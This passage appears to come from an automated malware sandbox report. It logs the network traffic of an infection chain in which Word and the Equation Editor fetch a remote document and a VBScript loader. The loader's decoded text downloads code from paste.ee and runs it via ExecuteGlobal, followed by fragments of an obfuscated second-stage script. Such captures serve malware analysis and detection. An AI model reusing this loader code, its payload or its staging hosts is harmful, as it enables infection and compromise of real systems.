                                                  Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:55.326071024 CET297INHTTP/1.1 302 Found
                                                  Date: Wed, 14 Feb 2024 07:29:55 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  X-Powered-By: PHP/8.2.12
                                                  Location: http://91.92.244.96/dashboard/
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=94
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Feb 14, 2024 08:29:55.326498985 CET169OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41
                                                  Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:55.525599957 CET612INHTTP/1.1 405 Method Not Allowed
                                                  Date: Wed, 14 Feb 2024 07:29:55 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Allow: GET,POST,OPTIONS,HEAD,TRACE
                                                  Content-Length: 327
                                                  Keep-Alive: timeout=5, max=93
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>
                                                  Feb 14, 2024 08:29:56.082498074 CET159OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
                                                  Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:56.279452085 CET297INHTTP/1.1 302 Found
                                                  Date: Wed, 14 Feb 2024 07:29:56 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  X-Powered-By: PHP/8.2.12
                                                  Location: http://91.92.244.96/dashboard/
                                                  Content-Length: 0
                                                  Keep-Alive: timeout=5, max=92
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=UTF-8
                                                  Feb 14, 2024 08:29:56.279704094 CET169OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41
                                                  Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 91.92.244.96
                                                  Feb 14, 2024 08:29:56.478178978 CET612INHTTP/1.1 405 Method Not Allowed
                                                  Date: Wed, 14 Feb 2024 07:29:56 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Allow: GET,POST,OPTIONS,HEAD,TRACE
                                                  Content-Length: 327
                                                  Keep-Alive: timeout=5, max=91
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 39 32 2e 32 34 34 2e 39 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 91.92.244.96 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.224916791.92.244.96802596C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Feb 14, 2024 08:29:51.299050093 CET245OUTHEAD /agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC HTTP/1.1
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Host: 91.92.244.96
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Feb 14, 2024 08:29:51.494163990 CET322INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:51 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Tue, 13 Feb 2024 00:59:02 GMT
                                                  ETag: "1083b-61138e6782878"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 67643
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/msword


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.224916891.92.244.96803192C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampBytes transferredDirectionData
                                                  Feb 14, 2024 08:29:52.211199045 CET318OUTGET /3566/loverhappy.vbs HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 91.92.244.96
                                                  Connection: Keep-Alive
                                                  Feb 14, 2024 08:29:52.406454086 CET940INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:52 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Wed, 14 Feb 2024 00:41:50 GMT
                                                  ETag: "290-6114cc6cd0c40"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 656
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Data Raw: ff fe 6c 00 65 00 6f 00 6e 00 74 00 6f 00 70 00 68 00 6f 00 6e 00 6f 00 20 00 3d 00 20 00 20 00 28 00 49 00 6e 00 74 00 28 00 28 00 63 00 61 00 63 00 75 00 6d 00 62 00 75 00 2d 00 63 00 68 00 69 00 62 00 61 00 72 00 72 00 61 00 64 00 61 00 2b 00 31 00 29 00 2a 00 52 00 6e 00 64 00 2b 00 63 00 68 00 69 00 62 00 61 00 72 00 72 00 61 00 64 00 61 00 29 00 29 00 0d 00 0a 00 53 00 65 00 74 00 20 00 6f 00 70 00 6f 00 62 00 61 00 6c 00 73 00 61 00 6d 00 65 00 69 00 72 00 61 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 57 00 69 00 6e 00 48 00 74 00 74 00 70 00 2e 00 57 00 69 00 6e 00 48 00 74 00 74 00 70 00 52 00 65 00 71 00 75 00 65 00 73 00 74 00 2e 00 35 00 2e 00 31 00 22 00 29 00 0d 00 0a 00 6f 00 70 00 6f 00 62 00 61 00 6c 00 73 00 61 00 6d 00 65 00 69 00 72 00 61 00 2e 00 4f 00 70 00 65 00 6e 00 20 00 22 00 47 00 45 00 54 00 22 00 2c 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 70 00 61 00 73 00 74 00 65 00 2e 00 65 00 65 00 2f 00 64 00 2f 00 65 00 41 00 33 00 46 00 4d 00 22 00 2c 00 20 00 46 00 61 00 6c 00 73 00 65 00 0d 00 0a 00 6f 00 70 00 6f 00 62 00 61 00 6c 00 73 00 61 00 6d 00 65 00 69 00 72 00 61 00 2e 00 53 00 65 00 6e 00 64 00 0d 00 0a 00 70 00 6f 00 73 00 73 00 65 00 73 00 73 00 69 00 76 00 6f 00 20 00 3d 00 20 00 6f 00 70 00 6f 00 62 00 61 00 6c 00 73 00 61 00 6d 00 65 00 69 00 72 00 61 00 2e 00 52 00 65 00 73 00 70 00 6f 00 6e 00 73 00 65 00 54 00 65 00 78 00 74 00 0d 00 0a 00 63 00 6c 00 69 00 65 00 6e 00 74 00 65 00 20 00 70 00 6f 00 73 00 73 00 65 00 73 00 73 00 69 00 76 00 6f 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 63 00 6c 00 69 00 65 00 6e 00 74 00 65 00 28 00 61 00 66 00 66 00 69 00 78 00 61 00 72 00 29 00 0d 00 0a 00 45 00 78 00 65 00 63 00 75 00 74 00 65 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 20 00 61 00 66 00 66 00 69 00 78 00 61 00 72 00 0d 00 0a 00 45 00 6e 00 64 00 20 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00
                                                  Data Ascii: leontophono = (Int((cacumbu-chibarrada+1)*Rnd+chibarrada))Set opobalsameira = CreateObject("WinHttp.WinHttpRequest.5.1")opobalsameira.Open "GET","http://paste.ee/d/eA3FM", Falseopobalsameira.Sendpossessivo = opobalsameira.ResponseTextcliente possessivoFunction cliente(affixar)ExecuteGlobal affixarEnd Function


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.2249169104.21.84.67803248C:\Windows\SysWOW64\wscript.exe
                                                  TimestampBytes transferredDirectionData
                                                  Feb 14, 2024 08:29:53.224703074 CET149OUTGET /d/eA3FM HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                  Host: paste.ee
                                                  Feb 14, 2024 08:29:53.429343939 CET784INHTTP/1.1 301 Moved Permanently
                                                  Date: Wed, 14 Feb 2024 07:29:53 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Location: https://paste.ee/d/eA3FM
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o5pepJ0Kws5Th0ZQpsgakJ60lD9DNZRfIPEhzIsYKHNkU8phoo2feJWu1z0W%2FRL7fXvTsgVhrBUPbjqBefnh%2F7SaW9t9hqheFi9eUYdFqvTDY3ZfxyM0MmFwCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 85539a43ff0db032-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                  Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                  Feb 14, 2024 08:29:53.429404974 CET5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.2249170104.21.84.674433248C:\Windows\SysWOW64\wscript.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-02-14 07:29:54 UTC149OUTGET /d/eA3FM HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                  Host: paste.ee
                                                  2024-02-14 07:29:54 UTC1236INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:54 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=2592000
                                                  strict-transport-security: max-age=63072000
                                                  x-frame-options: DENY
                                                  x-content-type-options: nosniff
                                                  x-xss-protection: 1; mode=block
                                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1FNnU8fjSx2kfRKuXZPn3ssCh5A%2FnXCl2WUAPFT2dFCYDJ3lwRznxScIdOFqICPEys3u6wFDO1YX%2BubKHYHOKJr1oAtJ1%2FpVc5HjCBgm5kHQRUyiHfGF%2BoTKGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 85539a4b4c2fb172-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-02-14 07:29:54 UTC133INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 63 61 69 6e 63 65 6e 74 61 20 2c 20 73 61 72 61 62 61 63 61 6e 61 20 2c 20 74 69 74 69 6c 61 6e 74 65 20 2c 20 67 72 69 74 6f 20 2c 20 62 6f 72 64 61 67 65 20 2c 20 43 61 6d 61 20 2c 20 62 6f 72 64 61 67 65 31 0d 0a 20 20 20 20 20 73 61 72 61 62 61 63 61 6e 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 74 69 74 69 6c 61 6e 74 65 20 20 3d 20 22 22
                                                  Data Ascii: 1f7f dim caincenta , sarabacana , titilante , grito , bordage , Cama , bordage1 sarabacana = " " titilante = ""
                                                  2024-02-14 07:29:54 UTC1369INData Raw: 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72 65 43 44
                                                  Data Ascii: & grito & sarabacana & grito & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCD
                                                  2024-02-14 07:29:54 UTC1369INData Raw: 61 20 26 20 67 72 69 74 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 61 51 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 47 67 44 67 54 72 65 64 51 42 6d 44 67 54 72 65 47 59 44 67 54 72 65 62 44 67 54 72 65 42 6c 44 67 54 72 65 47 51 44 67 54 72 65 54 44 67 54 72 65 42 70 44 67 54 72 65 47 34 44 67 54 72 65 61 77 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65 49 44
                                                  Data Ascii: a & grito & "gBvDgTreHIDgTre" & grito & sarabacana & grito & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreID
                                                  2024-02-14 07:29:54 UTC1369INData Raw: 72 65 76 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 33 44 67 54 72 65 46 38 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 77 42 6c 44 67 54 72 65 46 38 44 67 54 72 65 64 67 42 69 44 67 54 72 65 48 4d 44 67 54 72 65 58 77 42 31 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 44 67 54 72 65 42 68 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 6b
                                                  Data Ascii: revDgTreG4DgTre" & grito & sarabacana & grito & "QB3DgTreF8DgTreaQBtDgTreGEDgTre" & grito & sarabacana & grito & "wBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTre" & grito & sarabacana & grito & "DgTreBhDgTreHQDgTre" & grito & sarabacana & grito & "QBk
                                                  2024-02-14 07:29:54 UTC1369INData Raw: 67 54 72 65 43 51 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 77 42 6c 44 67 54 72 65 46 51 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 46 51 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 4c
                                                  Data Ascii: gTreCQDgTreaQBtDgTreGEDgTre" & grito & sarabacana & grito & "wBlDgTreFQDgTre" & grito & sarabacana & grito & "QB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTre" & grito & sarabacana & grito & "QB4DgTreHQDgTreL
                                                  2024-02-14 07:29:54 UTC1369INData Raw: 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 77 42 6c 44 67 54 72 65 46 51 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 4c
                                                  Data Ascii: re" & grito & sarabacana & grito & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & grito & sarabacana & grito & "QB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTre" & grito & sarabacana & grito & "wBlDgTreFQDgTre" & grito & sarabacana & grito & "QB4DgTreHQDgTreL
                                                  2024-02-14 07:29:54 UTC1093INData Raw: 67 54 72 65 54 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 77 42 30 44 67 54 72 65 47 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65
                                                  Data Ascii: gTreTDgTreBlDgTreG4DgTre" & grito & sarabacana & grito & "wB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTre" & grito & sarabacana & grito & "DgTreBJDgTreG4DgTre" & grito & sarabacana & grito & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTre
                                                  2024-02-14 07:29:54 UTC1369INData Raw: 31 30 34 39 0d 0a 20 22 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 58 51 44 67 54 72 65 36 44 67 54 72 65 44 6f 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 43 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 77 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 54 72 65 59 67 42 68 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 67 72 69 74 6f 20 26 20 73 61 72 61 62 61 63 61 6e 61 20 26 20 67 72 69 74 6f 20 26 20 22 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 51 77 42 76 44 67
                                                  Data Ascii: 1049 "QByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre" & grito & sarabacana & grito & "wDgTreoDgTreCQDgTreYgBhDgTreHMDgTre" & grito & sarabacana & grito & "QDgTre2DgTreDQDgTreQwBvDg
